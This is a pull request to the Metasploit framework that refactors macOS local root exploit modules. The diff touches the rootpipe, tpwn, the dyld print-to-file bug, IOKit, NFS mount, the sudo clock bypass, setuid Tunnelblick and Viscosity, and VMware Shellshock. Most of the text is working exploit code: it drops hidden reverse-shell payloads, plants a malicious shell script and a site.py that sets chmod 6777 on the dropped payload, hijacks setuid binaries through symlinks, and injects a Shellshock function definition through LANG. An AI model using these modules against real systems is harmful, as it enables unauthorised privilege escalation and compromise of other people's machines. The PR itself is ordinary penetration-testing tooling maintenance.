### PR TITLE
Cleanup OSX local exploit modules

### DIFF
--- a/modules/exploits/osx/local/dyld_print_to_file_root.rb
+++ b/modules/exploits/osx/local/dyld_print_to_file_root.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = GreatRanking
 
+  include Msf::Post::OSX::Priv
   include Msf::Post::OSX::System
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
@@ -38,34 +39,52 @@ class MetasploitModule < Msf::Exploit::Local
         ['Mac OS X 10.10-10.10.4', {}]
       ],
       'DefaultTarget'  => 0,
-      'DefaultOptions' => {
-        'PAYLOAD'         => 'osx/x64/shell_reverse_tcp'
-      }
+      'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/shell_reverse_tcp' }
     ))
 
-    register_options([
+    register_options [
       OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
-    ])
+    ]
   end
 
-  def exploit
-    print_status("Writing payload to `#{payload_file}'")
-    write_file(payload_file, binary_payload)
-    register_file_for_cleanup(payload_file)
-    cmd_exec("chmod +x #{payload_file}")
-
-    print_status("Executing exploit at `#{payload_file}'...")
-    cmd_exec(sploit)
+  def base_dir
+    datastore['WritableDir'].to_s
   end
 
   def check
-    (ver?) ? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
+    (ver?) ? CheckCode::Appears : CheckCode::Safe
+  end
+
+  def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    upload payload_file, binary_payload
+    cmd_exec "chmod +x #{payload_file}"
+
+    print_status "Executing exploit at `#{payload_file}'..."
+    cmd_exec sploit
   end
 
   def ver?
     Gem::Version.new(get_sysinfo['ProductVersion']).between?(
       Gem::Version.new('10.10.0'), Gem::Version.new('10.10.4')
     )
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+    register_file_for_cleanup path
   end
 
   def sploit
@@ -78,6 +97,6 @@ class MetasploitModule < Msf::Exploit::Local
 
   def payload_file
     @payload_file ||=
-      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+      "#{base_dir}/.#{Rex::Text.rand_text_alpha(8..12)}"
   end
 end

--- a/modules/exploits/osx/local/iokit_keyboard_root.rb
+++ b/modules/exploits/osx/local/iokit_keyboard_root.rb
@@ -7,10 +7,11 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ManualRanking # Can cause kernel crash
 
   include Msf::Post::File
+  include Msf::Post::OSX::Priv
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
       'Name'          => 'Mac OS X IOKit Keyboard Driver Root Privilege Escalation',
       'Description'   => %q{
@@ -50,16 +51,24 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     if ver_lt(osx_ver, "10.10")
-      Exploit::CheckCode::Appears
+      CheckCode::Appears
     else
-      Exploit::CheckCode::Safe
+      CheckCode::Safe
     end
   end
 
   def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
     exploit_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2014-4404')
     binary_exploit = File.read(File.join(exploit_path, 'key_exploit'))
-    binary_payload   = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
+    binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
     exploit_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
     payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
 

--- a/modules/exploits/osx/local/nfs_mount_root.rb
+++ b/modules/exploits/osx/local/nfs_mount_root.rb
@@ -7,10 +7,11 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
   include Msf::Post::File
+  include Msf::Post::OSX::Priv
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
       'Name'          => 'Mac OS X NFS Mount Privilege Escalation Exploit',
       'Description'   => %q{
@@ -50,13 +51,21 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     if ver_lt(xnu_ver, "1699.32.7") and xnu_ver.strip != "1699.24.8"
-      Exploit::CheckCode::Appears
+      CheckCode::Appears
     else
-      Exploit::CheckCode::Safe
+      CheckCode::Safe
     end
   end
 
   def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
     osx_path = File.join(Msf::Config.install_root, 'data', 'exploits', 'osx')
     file = File.join(osx_path, 'nfs_mount_priv_escalation.bin')
     exploit = File.read(file)

--- a/modules/exploits/osx/local/root_no_password.rb
+++ b/modules/exploits/osx/local/root_no_password.rb
@@ -7,10 +7,11 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Post::File
+  include Msf::Post::OSX::Priv
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
       'Name'          => 'Mac OS X Root Privilege Escalation',
       'Description'   => %q{
@@ -49,6 +50,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
     payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
     print_status("Writing payload file as '#{payload_file}'")
     write_file(payload_file, payload.raw)

--- a/modules/exploits/osx/local/rootpipe.rb
+++ b/modules/exploits/osx/local/rootpipe.rb
@@ -51,10 +51,14 @@ class MetasploitModule < Msf::Exploit::Local
       }
     ))
 
-    register_options([
+    register_options [
       OptString.new('PYTHON',      [true, 'Python executable', '/usr/bin/python']),
       OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
-    ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
   end
 
   def check
@@ -64,6 +68,18 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     if is_root?
       fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless is_admin?
+      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."
+    end
+
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
     end
 
     print_status("Writing exploit to `#{exploit_file}'")

--- a/modules/exploits/osx/local/rootpipe_entitlements.rb
+++ b/modules/exploits/osx/local/rootpipe_entitlements.rb
@@ -43,23 +43,39 @@ class MetasploitModule < Msf::Exploit::Local
       }
     ))
 
-    register_options([
+    register_options [
       OptString.new('WRITABLEDIR', [true, 'Writable directory', '/.Trashes'])
-    ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
   end
 
   def check
     if ver? && is_admin?
       vprint_status("Version is between 10.9 and 10.10.3, and is admin.")
-      return Exploit::CheckCode::Appears
+      return CheckCode::Appears
     else
-      return Exploit::CheckCode::Safe
+      return CheckCode::Safe
     end
   end
 
   def exploit
     if is_root?
       fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless is_admin?
+      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."
+    end
+
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
     end
 
     print_status("Copying Directory Utility.app to #{new_app}")
@@ -77,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Local
     write_file(exploit_file, plugin_exploit)
 
     print_status("Running Directory Utility.app")
-    cmd_exec("/bin/sh -c 'PAYLOAD_IN="+payload_file+" PAYLOAD_OUT="+root_file+" #{new_app}/Contents/MacOS/Directory\\ Utility'")
+    cmd_exec("/bin/sh -c 'PAYLOAD_IN=#{payload_file} PAYLOAD_OUT=#{root_file} #{new_app}/Contents/MacOS/Directory\\ Utility'")
 
     print_status("Deleting Directory Utility.app")
     cmd_exec("rm -Rf '#{new_app}'")
@@ -115,7 +131,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def new_app
-    @app ||= "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}.app"
+    @app ||= "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}.app"
   end
 
   def plist
@@ -148,11 +164,11 @@ class MetasploitModule < Msf::Exploit::Local
 
   def payload_file
     @payload_file ||=
-      "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
+      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
   end
 
   def root_file
     @root_file ||=
-      "#{datastore['WRITABLEDIR']}/#{Rex::Text.rand_text_alpha(8)}"
+      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
   end
 end

--- a/modules/exploits/osx/local/rsh_libmalloc.rb
+++ b/modules/exploits/osx/local/rsh_libmalloc.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
+  include Msf::Post::OSX::Priv
   include Msf::Post::OSX::System
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
@@ -42,15 +43,25 @@ class MetasploitModule < Msf::Exploit::Local
       }
     ))
 
-    register_options(
-      [
-        OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),
-        OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
-      ], self.class
-    )
+    register_options [
+      OptInt.new('WaitTime', [true, 'Seconds to wait for exploit to work', 60]),
+      OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
   end
 
   def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
     # Check OS
     os_check
 

--- a/modules/exploits/osx/local/setuid_tunnelblick.rb
+++ b/modules/exploits/osx/local/setuid_tunnelblick.rb
@@ -8,10 +8,11 @@ require 'msf/core/exploit/exe'
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
-  include Msf::Exploit::EXE
+  include Msf::Post::OSX::Priv
   include Msf::Post::File
+  include Msf::Exploit::EXE
 
-  def initialize(info={})
+  def initialize(info = {})
     super( update_info( info, {
         'Name'           => 'Setuid Tunnelblick Privilege Escalation',
         'Description'    => %q{
@@ -44,42 +45,57 @@ class MetasploitModule < Msf::Exploit::Local
             [ 'Tunnelblick 3.2.8 / Mac OS X x64',    { 'Arch' => ARCH_X64 } ]
           ],
         'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
-        'DefaultTarget' => 0
+        'DefaultTarget'  => 0
       }))
-    register_options([
-        # These are not OptPath becuase it's a *remote* path
+    register_options [
+        # These are not OptPath because it's a *remote* path
         OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
         OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ])
-      ])
+      ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
   end
 
   def check
-    if not file?(datastore["Tunnelblick"])
-      vprint_error "openvpnstart not found"
+    unless file? datastore['Tunnelblick']
+      vprint_error 'openvpnstart not found'
       return CheckCode::Safe
     end
 
     check = cmd_exec("find  #{datastore["Tunnelblick"]} -type f -user root -perm -4000")
 
-    if check =~ /openvpnstart/
-      return CheckCode::Vulnerable
+    unless check.include? 'openvpnstart'
+      return CheckCode::Safe
     end
 
-    return CheckCode::Safe
+    CheckCode::Vulnerable
   end
 
   def clean
     file_rm(@link)
-    cmd_exec("rm -rf #{datastore["WritableDir"]}/openvpn")
+    cmd_exec("rm -rf #{base_dir}/openvpn")
   end
 
   def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    if check != CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
 
     print_status("Creating directory...")
-    cmd_exec "mkdir -p #{datastore["WritableDir"]}/openvpn/openvpn-0"
+    cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"
 
     exe_name = rand_text_alpha(8)
-    @exe_file = "#{datastore["WritableDir"]}/openvpn/openvpn-0/#{exe_name}"
+    @exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"
     print_status("Dropping executable #{@exe_file}")
     write_file(@exe_file, generate_payload_exe)
     cmd_exec "chmod +x #{@exe_file}"
@@ -90,13 +106,13 @@ class MetasploitModule < Msf::Exploit::Local
 #{@exe_file}
     EOF
 
-    @sh_file = "#{datastore["WritableDir"]}/openvpn/openvpn-0/openvpn"
+    @sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"
     print_status("Dropping shell script #{@sh_file}...")
     write_file(@sh_file, evil_sh)
     cmd_exec "chmod +x #{@sh_file}"
 
     link_name = rand_text_alpha(8)
-    @link = "#{datastore["WritableDir"]}/#{link_name}"
+    @link = "#{base_dir}/#{link_name}"
     print_status("Creating symlink #{@link}...")
     cmd_exec "ln -s -f -v #{datastore["Tunnelblick"]} #{@link}"
 
@@ -104,11 +120,11 @@ class MetasploitModule < Msf::Exploit::Local
     begin
       cmd_exec "#{@link} OpenVPNInfo 0"
     rescue
-      print_error("Failed. Cleaning files #{@link} and the #{datastore["WritableDir"]}/openvpn directory")
+      print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")
       clean
       return
     end
-    print_warning("Remember to clean files: #{@link} and the #{datastore["WritableDir"]}/openvpn directory")
+    print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")
   end
 end
 

--- a/modules/exploits/osx/local/setuid_viscosity.rb
+++ b/modules/exploits/osx/local/setuid_viscosity.rb
@@ -8,10 +8,11 @@ require 'msf/core/exploit/exe'
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
-  include Msf::Exploit::EXE
+  include Msf::Post::OSX::Priv
   include Msf::Post::File
+  include Msf::Exploit::EXE
 
-  def initialize(info={})
+  def initialize(info = {})
     super( update_info( info, {
         'Name'           => 'Viscosity setuid-set ViscosityHelper Privilege Escalation',
         'Description'    => %q{
@@ -46,26 +47,30 @@ class MetasploitModule < Msf::Exploit::Local
         'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
         'DefaultTarget' => 0
       }))
-    register_options([
-        # These are not OptPath becuase it's a *remote* path
-        OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
-        OptString.new("Viscosity",   [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ])
-      ])
+    register_options [
+      # These are not OptPath because it's a *remote* path
+      OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
+      OptString.new("Viscosity",   [ true, "Path to setuid ViscosityHelper executable", "/Applications/Viscosity.app/Contents/Resources/ViscosityHelper" ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
   end
 
   def check
-    if not file?(datastore["Viscosity"])
-      vprint_error "ViscosityHelper not found"
+    unless file? datastore['Viscosity']
+      vprint_error 'ViscosityHelper not found'
       return CheckCode::Safe
     end
 
     check = cmd_exec("find  #{datastore["Viscosity"]} -type f -user root -perm -4000")
 
-    if check =~ /ViscosityHelper/
-      return CheckCode::Vulnerable
+    unless check.include? 'ViscosityHelper'
+      return CheckCode::Safe
     end
 
-    return CheckCode::Safe
+    CheckCode::Vulnerable
   end
 
   def clean
@@ -76,9 +81,20 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    if check != CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
 
     exe_name = rand_text_alpha(8)
-    @exe_file = "#{datastore["WritableDir"]}/#{exe_name}"
+    @exe_file = "#{base_dir}/#{exe_name}"
     print_status("Dropping executable #{@exe_file}")
     write_file(@exe_file, generate_payload_exe)
 
@@ -91,13 +107,13 @@ os.system("chmod 6777 #{@exe_file}")
 os.execl("#{@exe_file}", "#{exe_name}")
     EOF
 
-    @python_file = "#{datastore["WritableDir"]}/site.py"
+    @python_file = "#{base_dir}/site.py"
     print_status("Dropping python #{@python_file}...")
     write_file(@python_file, evil_python)
 
     print_status("Creating symlink...")
     link_name = rand_text_alpha(8)
-    @link = "#{datastore["WritableDir"]}/#{link_name}"
+    @link = "#{base_dir}/#{link_name}"
     cmd_exec "ln -s -f -v #{datastore["Viscosity"]} #{@link}"
 
     print_status("Running...")

--- a/modules/exploits/osx/local/sudo_password_bypass.rb
+++ b/modules/exploits/osx/local/sudo_password_bypass.rb
@@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Local
   # it at his own risk
   Rank = NormalRanking
 
-  include Msf::Post::OSX::Priv
   include Msf::Post::File
+  include Msf::Post::OSX::Priv
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
@@ -25,7 +25,7 @@ class MetasploitModule < Msf::Exploit::Local
   # saved clock config
   attr_accessor :clock_changed, :date, :network_server, :networked, :time, :zone
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
       'Name'          => 'Mac OS X Sudo Password Bypass',
       'Description'   => %q{
@@ -106,20 +106,21 @@ class MetasploitModule < Msf::Exploit::Local
       # and 1.8.0 through 1.8.6p6
       if not vn_bt(sudo_vn, VULNERABLE_VERSION_RANGES)
         vprint_error "sudo version #{sudo_vn} not vulnerable."
-        return Exploit::CheckCode::Safe
+        return CheckCode::Safe
       end
     else
       vprint_error "sudo not detected on the system."
-      return Exploit::CheckCode::Safe
+      return CheckCode::Safe
     end
 
     # check that the user is in OSX's admin group, necessary to change sys clock
     unless is_admin?
       vprint_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
-      return Exploit::CheckCode::Safe
+      return CheckCode::Safe
     end
+
     # one root for you sir
-    return Exploit::CheckCode::Vulnerable
+    CheckCode::Vulnerable
   end
 
   def exploit
@@ -128,7 +129,11 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     unless is_admin?
-      fail_with(Failure::NoAccess, "User is not in the 'admin' group, bailing.")
+      fail_with Failure::NoAccess, "User is not in the 'admin' group, bailing."
+    end
+
+    if check != CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end
 
     # "remember" the current system time/date/network/zone

--- a/modules/exploits/osx/local/tpwn.rb
+++ b/modules/exploits/osx/local/tpwn.rb
@@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
+  include Msf::Post::OSX::Priv
   include Msf::Post::OSX::System
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
@@ -38,16 +39,32 @@ class MetasploitModule < Msf::Exploit::Local
       'DefaultTarget'  => 0
     ))
 
-    register_options([
+    register_options [
       OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes'])
-    ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
   end
 
   def check
-    ver?? Exploit::CheckCode::Appears : Exploit::CheckCode::Safe
+    ver?? CheckCode::Appears : CheckCode::Safe
   end
 
   def exploit
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    if check != CheckCode::Appears
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
     print_status("Writing exploit to `#{exploit_file}'")
     write_file(exploit_file, binary_exploit)
     register_file_for_cleanup(exploit_file)
@@ -84,11 +101,11 @@ class MetasploitModule < Msf::Exploit::Local
 
   def exploit_file
     @exploit_file ||=
-      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
   end
 
   def payload_file
     @payload_file ||=
-      "#{datastore['WritableDir']}/#{Rex::Text.rand_text_alpha(8)}"
+      "#{base_dir}/#{Rex::Text.rand_text_alpha(8)}"
   end
 end

--- a/modules/exploits/osx/local/vmware_bash_function_root.rb
+++ b/modules/exploits/osx/local/vmware_bash_function_root.rb
@@ -7,10 +7,11 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = NormalRanking
 
   include Msf::Post::File
+  include Msf::Post::OSX::Priv
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
-  def initialize(info={})
+  def initialize(info = {})
     super(update_info(info,
       'Name'          => 'OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock)',
       'Description'   => %q{
@@ -49,9 +50,20 @@ class MetasploitModule < Msf::Exploit::Local
       'DisclosureDate' => 'Sep 24 2014'
     ))
 
-    register_options([
+    register_options [
+      OptString.new('WritableDir', [true, 'Writable directory', '/tmp']),
       OptString.new('VMWARE_PATH', [true, "The path to VMware.app", '/Applications/VMware Fusion.app']),
-    ])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+    register_file_for_cleanup path
   end
 
   def check
@@ -60,23 +72,32 @@ class MetasploitModule < Msf::Exploit::Local
     if cmd_exec("env x='() { :;}; echo #{check_str}' bash -c echo").include?(check_str) &&
        cmd_exec("file '#{datastore['VMWARE_PATH']}'") !~ /cannot open/
 
-      Exploit::CheckCode::Vulnerable
+      CheckCode::Vulnerable
     else
-      Exploit::CheckCode::Safe
+      CheckCode::Safe
     end
   end
 
   def exploit
-    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
-    path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
 
-    print_status("Writing payload file as '#{payload_file}'")
+    if check != CheckCode::Vulnerable
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    unless cmd_exec("test -w '#{base_dir}' && echo true").include? 'true'
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    payload_file = "#{base_dir}/.#{Rex::Text::rand_text_alpha_lower(8..12)}"
     exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
-    write_file(payload_file, exe)
-    register_file_for_cleanup(payload_file)
-    cmd_exec("chmod +x #{payload_file}")
+    upload payload_file, exe
+    cmd_exec "chmod +x #{payload_file}"
 
-    print_status("Running VMWare services...")
+    print_status 'Running VMWare services...'
+    path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary
     cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random")
   end
 end


### PR DESCRIPTION
This PR cleans up all the OSX local exploit modules.

I don't have the software to test. None of these changes have been tested beyond ensuring msf throws no errors at startup. The majority of the new code patterns from which these changes borrow largely have been tested on the Linux local exploits.

Style changes were kept to a minimum, except where I was certain there would be no unintended consequences. In most instances I left the original module structure intact to ensure the original author's intended code aesthetics remained largely unchanged. There are two exceptions where I added an `upload` method, arguably unnecessarily.

Changes include:

* Added common code patters from Linux local exploits, such as:
  * checking if the user is already `root`;
  * checking if `datastore['WritableDir']` is writable; and
  * checking the return value from `check` where applicable.
* Using `is_root?` and `is_admin?` from the new `Msf::Post::OSX::Priv` lib
* Removed instances of `self.class` from `register_options`
* The payload filename written to disk was prepended with a `.` and the length was randomised in instances where I was fairly certain this would not affect the exploit.
* Some sting concatenation has been replaced with interpolation.
* Some unnecessary double quotes have been replaced in instances where string interpolation was not required.
* Instances of `Exploit::CheckCode::*` have been replaced with `CheckCode::*`
